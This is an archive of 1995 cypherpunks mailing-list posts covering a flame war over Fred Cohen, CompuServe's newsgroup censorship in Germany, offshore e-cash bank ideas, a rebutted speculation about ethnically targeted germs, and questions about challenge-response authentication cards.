-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMOW5DCS9AwzY9LDxAQEF3QP/SjHSSva0F/aolc++yrQbL9Mk0V/Nnl60
mxUmDKJ2C8dH9D5EKwwPhgQ1kknp/90JGHztzjKJwG9jkPDixMa1vL3U4iRToy3v
kQ9Ziwr5A/WwMS+6d0++54qMwMEgwVWdmbVJVzrB6VxSPqvVvlmw3t7keBnZGiRA
1dT7Rlq1HsY=
=tm8l
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Christopher J. Shaulis" <cjs@netcom.com>
Date: Sun, 31 Dec 1995 07:37:48 +0800
To: fc@all.net (Fred Cohen)
Subject: Re: Is Dr Fred Cohen a Loon???
In-Reply-To: <9512302200.AA14470@all.net>
Message-ID: <199512302133.QAA00352@localhost.cjs.net>
MIME-Version: 1.0
Content-Type: text


> > The Subject says it all... I believe Fred suffers from a severely inflated
> > ego and suffers from the "false expert" syndrome detailed by various
> > self-help orgs... what say you fred??
> 
> People who call me a "false expert" are so afraid of damaging their own
> reputation by doing so that they have to do it anonymously. 

Reguardless if it is said anonymously or not, the fact remains that
you are a loon, and you couldn't get a clue if they gave them away in
rice krispies boxes.

As always, I encourage everyone reading this thread to not reply to it
'cuz it does nothing but encourage Freddy to post more jibberish.

> 
> -> See: Info-Sec Heaven at URL http://all.net/
> Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Cees de Groot" <cg@bofh.toad.com (none)>"Cees de Groot" <C.deGroot@inter.nl.net>
Date: Sun, 31 Dec 1995 01:10:28 +0800
To: cypherpunks@toad.com
Subject: Australian "calculatorcard"
Message-ID: <199512301556.QAA31294@bofh.cdg.openlink.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


Hi everybody,

Yesterday, on UK Discovery, there was an item in the programme Beyond 2000
about an Australian card which implements a challenge-response protocol
and can be used for banking, etcetera. Basically, you give your card
number (over the phone), get a challenge number, enter your pin and
the challenge, and then give the response. All in CC format...

They plugged it as the ultimate identity-prover, so I'm kind of interested
in what's behind. Now, I know that Discovery constantly repeats old
stuff, so I'm not sure whether this is actually hot/new/... 

Can anybody provide me with pointers to more in-depth information about
this device and the algorithm(s) behind it ?

Thanks

-- 
Cees de Groot, OpenLink Software		     <C.deGroot@inter.NL.net>
262ui/2048: ID=4F018825 FP=5653C0DDECE4359D FFDDB8F7A7970789 [Key on servers]
 -- Any opinions expressed above might be mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Fred Cohen)
Date: Sun, 31 Dec 1995 06:47:42 +0800
To: nobody@c2.org (Anonymous User)
Subject: Re: Is Dr Fred Cohen a Loon???
In-Reply-To: <199512301723.JAA00902@infinity.c2.org>
Message-ID: <9512302200.AA14470@all.net>
MIME-Version: 1.0
Content-Type: text


> The Subject says it all... I believe Fred suffers from a severely inflated
> ego and suffers from the "false expert" syndrome detailed by various
> self-help orgs... what say you fred??

People who call me a "false expert" are so afraid of damaging their own
reputation by doing so that they have to do it anonymously. 

-> See: Info-Sec Heaven at URL http://all.net/
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 31 Dec 1995 08:48:25 +0800
To: cypherpunks@toad.com
Subject: Guerilla Internet Service Providers
Message-ID: <ad0b11c0300210046f19@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:18 PM 12/30/95, Lucky Green wrote:

>At best, Cypherpunks can hope to provide the infrastructure that will allow
>an underground to communicate semi-securely. We are unable to stop the
>global tidal wave of fascism. Let's not waste our time on bemoaning the
>freedoms crushed in its path. We have more important work to do.

And support your local ISPs!

(Or, even better, direct connection to the Net, though this is harder for
most of us to arrange.)

This CompuServe situation should be a great recruiting opportunity.
Cypherpunks in various parts of the country (and outside the U.S.) can get
active in local AOL, Prodigy, and Compuserve groups (and maybe even Netcom
chat groups, as Netcom is large enough to be a ripe target for harassment
by some zealous prosecutor or tort-crazed lawyer, as the Church of
Scientology case showed). They can tell the folks about local alternatives.

Having lots of small, decentralized providers makes censoring the Net all
the harder. Guerilla Internet Service Providers.

(I'm not disparaging Netcom. Tom Klemesrud not only fought the CoS, he has
also spoken out against CompuServe's action. I just understand that the
"deep pockets" effect means that any ISP large enough to register on the
radar screens of the statists will be targetted for regulation and
sanctioning. Better to have a thousand services, melting into the jungle
when the heavy artillery arrives.)

--Tim May

We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Lackey <ryan@pobox.com>
Date: Sun, 31 Dec 1995 08:13:42 +0800
To: cypherpunks@toad.com
Subject: Starting an e-cash bank
Message-ID: <199512302305.SAA20998@netaxs.com>
MIME-Version: 1.0
Content-Type: text/plain


_Money_ is at the root of control of cyberspace.  If states control the
banks issuing the currency, states will control cyberspace.  If the
banks/issuers of coins are beyond the reach of statist governments,
cyberspace will remain free.  Crytpo of course will allow the banks to issue
coins, but if they have to follow statist laws, crypto won't really help
them all that much -- I don't know many bank execs willing to face down the
US Government with nothing to back them up but ~unbreakable codes. 

What would it take to start an anonymous, private, secure, etc. etc. bank
issuing e-cash, located in a country without taxes/etc.?  I assume a tax
haven like the Cayman Islands or a small third world country somewhere would
have plenty of nice tax-shelter banks interested in such a venture.  Of
course, it would be quite illegal to transfer money to such a bank, but once
it's there, wouldn't coins be perfectly legitimate currency?  The bank could
even make money by issuing coins for $US held in vaults, $US invested in
different mutual-fund type things or other currencies, and perhaps even
coins backed only by the bank's profits (sounds like stock).

A cypherpunk?  me?,
Ryan
<ryan@pobox.com>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frankw@in.net (Frank Willoughby)
Date: Sun, 31 Dec 1995 08:43:09 +0800
To: cypherpunks@toad.com
Subject: Re: Massey, CEO of Compuserve, on Internet
Message-ID: <9512302338.AA07501@su1.in.net>
MIME-Version: 1.0
Content-Type: text/plain


Peter D. Junger writes:

8< [snip]

>One should also notice that Bavaria is only one state in the German
>Federal Republic; this case is more like Texas investigating
>Compuserve than the United States federal government investigating
>Compuserve.  Bavaria is the stronghold of what can properly be called
>the (Catholic) Religious Right in Germany.  It should also be noticed
>that in general German publications and television seem to be less
>constrained in publishing materials that in the United States would be
>called ``indecent'' by some than are United States publications and 
>broadcasters.
>

Peter has made some rather astute and accurate observations.  
(I particularly liked his analogy of Bavaria & Texas.  From my
experience, I would say that Bavaria is the Texas of Germany.)

While the Computserve incident in Germany may provoke outrage here 
& across the Internet, given the culture and other factors, the 
incident itself was rather inevitable (really).  After having lived
in Munich & Stuttgart, I'm just surprised it took so long to happen.  
(Then again, the wheels of bureaucracy do spin slowly).  8^)  I'm 
not saying I agree with their actions, but I think I do understand 
the mentality behind the actions.

I would venture to guess that the Bavarian State Police were trying
to enforce the JugendSchutzGesetz (Protection of Minors Law).  These
laws are posted in every restaurant, bar, etc.  As indicated by its 
title, the law basically serves to protect minors from the evils of 
the adult world.  It spells out what ages a person has to be to drink 
beer, hard liquor, etc, and covers curfews and other similar topics 
which serve to protect the youth.

The Compuserve censorship may be the result of an interpretation or 
enhancement of the JSG - in that because Compuserve really has no way 
of knowing the age of individuals who have access to pornographic 
materials, it is not capable of fully implementing the JSG.  (Although 
how this differs from cable TV (which shows porno movies and can't 
controll who sees them is beyond me).

Without commenting on the actions of the Bavarian State Police or 
Compuserve, I think that perhaps we are applying our standards to 
an incident in another culture - without viewing it in the context 
of that culture or country.  (In other words, comparing apples and
oranges.)

FWIW, there are a few differences between the USA and Germany which 
are related to the Compuserve incident and which may help to understand
why the police performed their actions.  I am not saying I agree with 
their actions, only that I think I understand the mentality behind the 
actions.  Anyway, here are a few differences:

1) Germans (and foreigners who live/work there) enjoy fewer freedoms 
   than we do - including freedom of speech, press, assembly, movement,
   etc.

2) The legal system is different than in the USA.  I'm not a lawyer, 
   but my impressions were that the police had far more liberties 
   with what they (legally) can do than do our counterparts here or 
   in other countries.  The OJ fiasco probably couldn't have happened
   in Germany (and he probably also wouldn't have gotten off).

3) There is no real separation of Church & State like we have here in 
   the USA.  As a result, the impact of the Catholic & Lutheran churches 
   on the German legal system & government is significant.  It has also 
   led the the government subsidizing (ie - providing public funds to) 
   the churches.

FWIW, the German government (like every other government on the planet)
is ill-equiped to handle something like the Internet and its impact on 
the social & legal systems of that country.


FWIW, the above is my opinion based on having lived there for over 9 
years.

Best Regards,


Frank

>--
>Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
>Internet:  junger@pdj2-ra.f-remote.cwru.edu    junger@samsara.law.cwru.edu

PS - The rest of this mail contains an elaboration of the points mentioned
     earlier.  They were separated from the summarized info mentioned above
     for those who are short on time or have no interest in the long version.

PPS - Four really neat things about Germany are the BDSG (Privacy Act), the
      mandatory (by law) 6-weeks paid vacation for all full-time employees,
      their sausages, and skiing.  (Their sausages are really great.  You
      might even say they're the best of the wurst.  The skiing can be flakey
      on occasion, though.)  8^)  8^)  8^)

PPPS - Have a Happy & Prosperous New Year!  8^)

-----------------------------------------------------------------------------

The following is an elaboration of the above differences, based on 
my observations while I was there.  I'm not taking a stand one way 
or another on these differences in this mail, just indicating what 
they are.

1) Germans (and foreigners who live/work there) enjoy fewer freedoms 
   than we do.  A few examples:

   - it is mandatory (ie - a law) that citizens & foreigners register 
     their domicile address with the police.  (When you move, you have 
     to unregister with the police in your old city, & register with 
     them in the new city).

   - it is not trivial to obtain a permit for a weapon (or obtain a 
     hunting license).

   - it is against the law to monitor police & government frequencies

   - until 1984/85), the radio & TV media were a monopoly of the State 
     (or government).  Commercial (ie - non-government owned) radio &
     TV stations didn't exist until then.  

   - the freedom of speech is more restricted than here.  Use of the 
     swastika symbol is prohibited by law.  Groups attempting to deny
     the abuses of WW II or promoting the rhetoric of the Hitler regime
     are outlawed.  

   - all demonstrations must be registered (and approved) by the police
     before they can ocur.

   - mandatory store closings (general).  Most stores are open 'til 6pm 
     on Monday, Tuesday, Wednesday, and Friday.  They stay open late 
     ('til 8:30pm) on Thursdays.  Saturdays, the stores are open 'til 
     2pm unless it is the first Saturday of the month (& then 'til 5pm).

   - all TVs, radios have to be registered with the BundesPost (and you
     will be charged a fee).  The BundesPost uses vans with have the 
     ability to detect which apartments have TVs (as well as which channel
     the individual is watching).  (I have seen the vans & have had a 
     brief conversation with some of the BP employees who have used this
     equipment).


2) The legal system is different than in the USA.  I'm not a lawyer, but 
   my impressions were that the police had far more liberties with what 
   they (legally) can do than do our counterparts here or in other countries.
   On the plus side, the police are very efficient (but having access to 
   a nationwide databank about every person in the country helps to increase
   the efficiency in catching crooks).

   - One law in particular is the JugendSchutzGesetz (Protection of 
     Minors Law).  The JSG spells out exactly what ages a person has
     to be to drink beer, hard liquor, etc.  (I believe it also covers
     curfews, movie ratings, etc.).  The Compuserve censorship may be
     the result of an interpretation or enhancement of the JSG - in
     that because Compuserve really has no way of knowing the age of 
     individuals who have access to pornographic materials, it is not
     capable of fully implementing the JSG.  (Although how this differs
     from cable TV (which offers porno movies is beyond me).

   - One thing to be admired, though, is the German Information/Data
     Privacy Act (BundesDatenSchutzGesetz = BDSG).  The BDSG is one
     of the most stringent privacy laws in the world.  Actually, it
     is a shame that we don't have a law like the BDSG (with a few 
     minor changes).  (Our Privacy Act here in the USA is a joke).
     The abuses of privacy which result in the collection and 
     distribution of personal data here in the USA is simply 
     unbelievable.

   - I also had the impression that in the German court system, the 
     burden of proof is on the accused, not the prosecution.  This is
     somewhat analagous to the military courts here in the USA.


3) There is no separation of Church & State like we have here in the USA.

   - All persons who are subject to taxes are required to pay a Church 
     Tax (Kirchensteuer) of 1% of their pay to support a few of the major
     churches in Germany (primarily, the Catholic, the Lutheran, and
     the Jewish religious institutions).  The only exemption to this is
     for those who fill out an affadavit that they have formally left
     their church or those whose voluntary contributions to their church
     exceed 1%.  BTW, the German tax laws also differentiate between 
     members of the 3 churches mentioned above & others.

   - Major religious institutions are subsidized & receive financial 
     support by the government (from the Kirchensteuer), as well as 
     additional funding for the preservation & upkeep of historic 
     religious buildings, etc.  I remember seeing an investigative 
     report on German TV which provided a list of which religious 
     institutions received how much money and the reason why those 
     funds were given to the churches by the government.  I don't 
     remember the acutual sums involved, but they were rather large 
     (hundreds of millions of dollars or above, if my memory serves).

   - The Catholic & Lutheran churches in particular have enormous 
     political clout (far more than they ever could here in the USA) 
     and are a force to be reckoned with.  Although from my observations, 
     the Catholic church has more clout than the Lutheran.  Their clout
     has a major impact on the political & legal sytems in Germany.
     An illustration of this is that one of the top two political 
     parties in Germany is the CDU (Christian Democratic Union).

   - The ability of a church's missionaries to proselytize is heavily
     regulated/restricted - particularly if they are not one of the 
     top three churches mentioned earlier.

   - In general, the top 3 churches mentioned above are given preferential
     treatment.  Other denominations are generally ignored by the German
     government.

In conclusion:
None of the above statements are intended to be critical of Germans
or of the German government, or anything/anyone else.  These are 
merely my personal observations.
-----------------------------------------------------------------------------
Fortified Networks Inc. - Management & Information Security Consulting
Phone: (317) 573-0800   - http://www.fortified.com/fortified

<standard disclaimer>
The opinions expressed above are of the author and may not 
necessarily be representative of Fortified Networks Inc.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sun, 31 Dec 1995 11:07:32 +0800
To: Mark Neely <cypherpunks@toad.com
Subject: Re: Massey, CEO of Compuserve, on Internet
Message-ID: <v02120d02ad0baabb44cb@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 13:20 12/31/95, Mark Neely wrote:

>I assume that C$ is only filtering the newsfeed as it hits German shores?
>Please tell me
>they aren't denying access to these "banned" newsgroups for all users
>worldwide!

I am afraid they are.


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: doc@intellinet.com (Doc)
Date: Sun, 31 Dec 1995 09:43:26 +0800
To: cypherpunks@toad.com
Subject: EMail Blockade for Compuserve?
Message-ID: <199512310121.TAA02917@intellinet.com>
MIME-Version: 1.0
Content-Type: text/plain


I dont know if this is a good idea.
I think CI$ shut off the newsgroups due to economic presure-
from some German officials.  Drop them or we ban CI$.

Now, if CI$ were to shed excess customers in the rest of
the world... they might just turn those newsgroups back on.

So if folks turned on twit filters and deleted-before-reading
mail from anyone@compuserve - and if folks, newsletters etc
refused to SEND mail to accounts@ci$ 
  ...  well if enough ci$ customers were to LEAVE.

This is not a proposal..some of my best friends are at compuserve.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol SysAdmin]" <erc@dal1820.computek.net>
Date: Sun, 31 Dec 1995 10:17:48 +0800
To: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Subject: Re: Is Dr Fred Cohen a Loon???
In-Reply-To: <uB0XgD36w165w@bwalk.dm.com>
Message-ID: <199512310155.TAA12831@dal1820.computek.net>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

> 
> The following comment has zero crypto relevance and should not be construed
> as an attack on and/or a defense of any particular net.personality:
> 
> "Ed Carp [khijol SysAdmin]" <erc@dal1820.computek.net> writes:
> > OK, I'll do it.  Fred, sometimes your pontifications make as little sense
> > as you arrogantly signing "Dr. Fred Cohen" in your name field.
> 
> Without commenting on the quality of anyone's contributions to this mailing
> list, let me remind you that Dr. Fred Cohen received his Ph.D. after writing a
> very innovative thesis on computer viruses, a classic in his field. He has
> every right to call himself "Dr." if he wants to.
> 
> In my experience, people who get so hysterical when a Ph.D. calls himself or
> herself Dr. are invariably Ph.D. dropouts who wasted many years of their lives
> trying and failing to attain a Ph.D. and are bitterly envious of those who have
> succeeded.

Not at all -- but it's been *my* experience that people who rely on 
titles and degrees and such have very little else to recommend them.

I am as unenvious of Mr. Cohen as I am of Bruce Schneier - and Bruce has a
lot more of my respect.  Just because someone writes a "very innovative
thesis" on viruses doesn't mean they know diddly about anything else,
especially cryptography.  Where is Fred's paper?  I've got Bruce's book on
my shelf that I can read for myself and *that's* a classic in the field. 
When "I can read Fred's paper for myself, then I can judge the merits of
his degree.  Until then, I consider him no different than any other PhD
whose gotten themselves a degree and become convinced that the doctorate
entitles them to pontificate upon any and every subject under the sun as
though they knew absolutely everything about any subject that happens to
catch their fancy. 

Just remember - PhD means 'piled higher and deeper'.
- --
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/digital pager
					800/558-3408 SkyPager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

"Past the wounds of childhood, past the fallen dreams and the broken families,
through the hurt and the loss and the agony only the night ever hears, is a
waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
asks only one thing of you ... 'Remember who it is you really are.'"

                    -- "Losing Your Mind", Karen Alexander and Rick Boyes

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMOXtjyS9AwzY9LDxAQFoZQQAiBsi6i3tGeY1oJ4bL4UJthdmsW77ZybC
BPpdGBvGc8IyJo9V2uMCW5nU/4LJeX08IAKWS1pt4xTPrz4HlLEJXgAWVnPErTqj
V9MXmI1QY79cmtd2MvJUoUNtq7O4fbD4Hg/ZRRdY3YNZvrlXlRRdbU6m01xSAxOR
4ApMv7cboz4=
=DjDf
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Sun, 31 Dec 1995 09:59:12 +0800
To: cypherpunks@toad.com
Subject: Re: Is Dr Fred Cohen a Loon???
In-Reply-To: <199512302211.QAA14605@dal1820.computek.net>
Message-ID: <uB0XgD36w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


The following comment has zero crypto relevance and should not be construed
as an attack on and/or a defense of any particular net.personality:

"Ed Carp [khijol SysAdmin]" <erc@dal1820.computek.net> writes:
> OK, I'll do it.  Fred, sometimes your pontifications make as little sense
> as you arrogantly signing "Dr. Fred Cohen" in your name field.

Without commenting on the quality of anyone's contributions to this mailing
list, let me remind you that Dr. Fred Cohen received his Ph.D. after writing a
very innovative thesis on computer viruses, a classic in his field. He has
every right to call himself "Dr." if he wants to.

In my experience, people who get so hysterical when a Ph.D. calls himself or
herself Dr. are invariably Ph.D. dropouts who wasted many years of their lives
trying and failing to attain a Ph.D. and are bitterly envious of those who have
succeeded.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jason Burrell <jburrell@crl.com>
Date: Sun, 31 Dec 1995 15:02:31 +0800
To: Mark Neely <accessnt@ozemail.com.au>
Subject: Re: Massey, CEO of Compuserve, on Internet
In-Reply-To: <199512310220.NAA16258@oznet02.ozemail.com.au>
Message-ID: <Pine.SUN.3.91.951230211055.10513A-100000@crl6.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 31 Dec 1995, Mark Neely wrote:

> I assume that C$ is only filtering the newsfeed as it hits German shores?
> Please tell me
> they aren't denying access to these "banned" newsgroups for all users worldwide!
> 
> Mark

Unfortunately, that's exactly what they're doing. Check out
comp.org.eff.talk for more a discussion of it. 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blanc <blancw@accessone.com>
Date: Sun, 31 Dec 1995 15:13:31 +0800
To: "cypherpunks@toad.com>
Subject: RE: last straw (or Possible Developments re Censorship)
Message-ID: <01BAD6FD.B8FBF560@blancw.accessone.com>
MIME-Version: 1.0
Content-Type: text/plain


From: Dr. Dimitri Vulis

And now comes the *point*:

There's much information on CompuServe that cannot be accessed from the outside.
One example is the very informative National Computer Security Association's
forum. ...[etc.]
...................................................................................................


Aside from the obvious implications to liberty,  of the backing down from standing up (!) to the demand for self-censorship, I was thinking about other possible developments:

Since, as 'Dr. Dimitri' mentions, CompuServe offers some info which is not available from other sources - and this info is often quite useful/valuable to business enterprises, such that they and other individuals would not be too keen on abandoning these immediately just for the principle of the thing - it could develop that those who are willing and can afford it, will end up "supporting", or getting services from, different providers based on the particular services which they offer.

This could represent a partial solution (in my mind, at least, not being inclined toward blanket censorship of all things discomfitting to my sensibilities) to the matter of there being free-radical electrons "out there" existing in the form & shape of various degrees of sexual permutations:  

.  Those concerned that their children may innocently surf over to alt.binaries.naughty.nude.x-rated.pictures and see alarming truths about adult behavior, and don't want to purchase the available filtering software, could subscribe to CompuServe and rest assured that their children would only have access to safe, industrial-strength info on that account.

.  Those wishing want to discuss their sexually-related personal problems, or who are pleased to just look at/talk about sex et al,  could continue do so through their subscription to the adult bbs-es or local ISPs providing uncensored access to all newsgroups.

It could develop that large companies providing internet access will seek to distinguish/identify themselves (as they are tending to do already) between the pablum-feeding family-types like AOL, or corporate/business-types like CompuServe, or free-for alls like local ISPs.   Such developments of course would depend on a tolerance for the existence of those un-specialized carriers which aren't adverse to transmitting controversial, "sensitive" content.   

These divisions among services might still not be acceptable to States and Nations & other 'busybodies', but the resistance to such developments would only serve to more explicitly define the problem;  it could make prominent the real issue of people's attitudes, fears, and expectations concerning sex & human nature, and of the obstacles in the way of achieving personal responsibility regarding these (among other things).

    ..
Blanc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Christopher J. Shaulis" <cjs@netcom.com>
Date: Sun, 31 Dec 1995 12:35:29 +0800
To: herbs@connobj.com (Herb Sutter)
Subject: Re: Is Dr Fred Cohen a Loon???
In-Reply-To: <2.2.32.19951231025816.0074caa0@mail.interlog.com>
Message-ID: <199512310246.VAA00949@localhost.cjs.net>
MIME-Version: 1.0
Content-Type: text


> I am neither attacking nor defending Fred Cohen; I don't know him from Adam,
> and haven't read his messages or his book.  But since you asked for where
  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

You should. They're hysterical. The man hasn't a clue to his name.           

> you can find Cohen's published work, there's one answer (assuming it's the
> same Fred Cohen).

Christopher




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jonnyx <jonnyx@edge.edge.net>
Date: Sun, 31 Dec 1995 12:23:34 +0800
To: cypherpunks@toad.com
Subject: (NOISE) Re: PLA_gue  Germ Terrorism
In-Reply-To: <199512301830.NAA05708@pipe4.nyc.pipeline.com>
Message-ID: <199512310354.VAA02877@edge.edge.net>
MIME-Version: 1.0
Content-Type: text/plain


In a recent message, John Young babbled:

>    12-30-95. To update the list of terrorist threats, the Wash
>    Post reports on the purchase in May of bubonic plague germs 
>    by "white supremacist" Larry Wayne Harris, his bust by the 
>    FBI and germ teams, prosecutors amazement that possession 
>    of such deadly micro-organisms is not illegal, and the 
>    consequent plea bargain of wire fraud with probation.

< snip >

Think that's fun? How 'bout this: given that the initial "mapping"
phase of the human genome project is nearly complete, and the huge
amount of genetic information available on the net, PLUS ever-
more-powerful-yet-less-costly computers anyone can purchase, just
how long do y'all think it'll be before some nut whips up a bug
that targets, say, people with negroid genetic characteristics?
Or epicanthic folds? Or blonde hair?

Seem kinda far-fetched? The November NUTS & VOLTS has a nifty 
six page article on garage genetic experimentation (how to convert
that old aquarium into an incubator, culturing techniques, etc.).
They even list souces for equipment AND GERMS. Yes folks, you can
order your very own "E-Z Gene Splicer DNA Recombination and
Transformation Kit" from the good folks at Images Company, POBox
140742, Staten Island NY 10314, (718) 698-8305, $49.95 each,
not recommended for children under 6 (too many parents complaining
about mutated family cats).

Quote from the article: "A word of caution is in order before we
start. Although the materials in the kit are safe, it is important 
for you to follow simple procedures to keep the experiment controlled
and nonthreatening." No shit. E-coli bacteria (what the kit uses)
aren't pathogens, but still... I guess every budding young white
supremist/right-wing religious nut/genocidal maniac has to start
somewhere. 
 
Pleasant dreams.
-- 
 
|| ______    || comments, criticisms, and/or death-threats may be sent to: ||
|| \__  /\   ||            jonny anonymous, c/o jonnyx@edge.net            ||
|| __/ /  \  ||  or snail-mail pobox 23001, nashvegas tn 37202-3001, usa   ||
|| \__/_/\_\ ||______"DRIVING DRUNK ON THE INFORMATION SUPERHIGHWAY!"______||

ps - Hey! I violated the new copyright laws with my quote AND I wrote a
     dirty word that 10 year olds might read! Cool! Wonder how else this
     message can get me in trouble?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Herb Sutter <herbs@connobj.com>
Date: Sun, 31 Dec 1995 11:24:24 +0800
To: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Subject: Re: Is Dr Fred Cohen a Loon???
Message-ID: <2.2.32.19951231025816.0074caa0@mail.interlog.com>
MIME-Version: 1.0
Content-Type: text/plain


At 19:55 12.30.1995 -0600, Ed Carp [khijol SysAdmin] wrote:
>I am as unenvious of Mr. Cohen as I am of Bruce Schneier - and Bruce has a
>lot more of my respect.  Just because someone writes a "very innovative
>thesis" on viruses doesn't mean they know diddly about anything else,
>especially cryptography.  Where is Fred's paper?  I've got Bruce's book on
>my shelf that I can read for myself and *that's* a classic in the field. 

In that case, look at the last two pages in "Applied Crypto - 2nd ed", where
Wiley puts ads for related books.  You'll find:

- "E-Mail Security", also by Bruce Schneier
- "Protection and Security on the Information Superhighway", by Frederick B.
Cohen
- "Digital Money", by Daniel Lynch and Leslie Lundquist

I am neither attacking nor defending Fred Cohen; I don't know him from Adam,
and haven't read his messages or his book.  But since you asked for where
you can find Cohen's published work, there's one answer (assuming it's the
same Fred Cohen).

Herb

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Herb Sutter (herbs@connobj.com)

Connected Object Solutions     2228 Urwin - Suite 102     voice 416-618-0184
http://www.connobj.com/      Oakville ON Canada L6L 2T2     fax 905-847-6019





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: zinc <zinc@zifi.genetics.utah.edu>
Date: Sun, 31 Dec 1995 14:38:48 +0800
To: jonnyx <jonnyx@edge.edge.net>
Subject: Re: (NOISE) Re: PLA_gue Germ Terrorism
In-Reply-To: <199512310354.VAA02877@edge.edge.net>
Message-ID: <Pine.LNX.3.91.951230214617.9080B-100000@zifi.genetics.utah.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sat, 30 Dec 1995, jonnyx wrote:

> Date: Sat, 30 Dec 1995 21:54:15 -0600 (CST)
> From: jonnyx <jonnyx@edge.edge.net>
> To: cypherpunks@toad.com
> Subject: (NOISE) Re: PLA_gue Germ Terrorism
> 
> In a recent message, John Young babbled:
> 
< GIANT snip >

am i troll-bait or what?
 
> Think that's fun? How 'bout this: given that the initial "mapping"
> phase of the human genome project is nearly complete, and the huge
> amount of genetic information available on the net, PLUS ever-
> more-powerful-yet-less-costly computers anyone can purchase, just
> how long do y'all think it'll be before some nut whips up a bug
> that targets, say, people with negroid genetic characteristics?
> Or epicanthic folds? Or blonde hair?

this is so much shit.  targetting anything is very difficult.  just ask 
all those people about the wonders of gene therapy.  hell, even the 
economist had an article about it's failures recently (Dec 16-22 1995, 
p77).

in any event the so-called 'differences' you are imagining are
phenotypes.  these are a long cry from DNA.  i'm not aware of any
genetic markers available to distinguish a black man from a white
man. and, even if there were, recombination requires long
stretches of homology between DNAs, not small differences.  i'd bet
it's nearly impossible to target black vs white vs yellow vs a
gorilla.
 
> Seem kinda far-fetched? The November NUTS & VOLTS has a nifty 

yes.

- -pjf

patrick finerty = zinc@zifi.genetics.utah.edu = pfinerty@nyx.cs.du.edu
U of Utah biochem grad student in the Bass lab - zinc fingers + dsRNA!
** FINGER zinc-pgp@zifi.genetics.utah.edu for pgp public key - CRYPTO!
zifi runs LINUX 1.2.11 -=-=-=WEB=-=-=->  http://zifi.genetics.utah.edu 


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMOYZtk3Qo/lG0AH5AQFFlAQAq/F+kLRXqyQZm9pIWMaXw8UWu3f4KERb
CKTBDCQqFiskwu1KOusB9vz3TwTAB2n7qzOBoTA69iPWXoAFW9yzHlEDTnKFmZbz
DTr9VNoNYkG8jlTA1Z5sBkjzPUAEFg7Gc2X2qrahE8hOWVEKdS220bhF1TEXdevD
f2Zj5hD88bI=
=BMiz
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Johnathan Corgan <jcorgan@aeinet.com>
Date: Sun, 31 Dec 1995 16:09:35 +0800
To: amp <C.deGroot@inter.nl.net>
Subject: Re: Australian "calculatorcard"
Message-ID: <199512310627.WAA11299@scruz.net>
MIME-Version: 1.0
Content-Type: text/plain


>sounds like the card i use for remote dialup to certain non-public
>systems i use at work. it has a six digit number on the front that
>changes every 60 seconds. the card is registered to me. when i enter
>my username/password i'm prompted for the number. it's Pretty Good
>(tm) security, but like anything not biometric, it is vulnerable to
>black-bag attacks. physical possession being all that is required. if
>you know the algorithm and the serial number of the card and the
>time, even that isn't necessary.
>
>
>CG> Can anybody provide me with pointers to more in-depth information
>CG> about this device and the algorithm(s) behind it ?
>
>i don't know if there are any net sources for them, but i'd be
>suprised if not. my card references "security dynamics" of cambridge
>massachusetts.

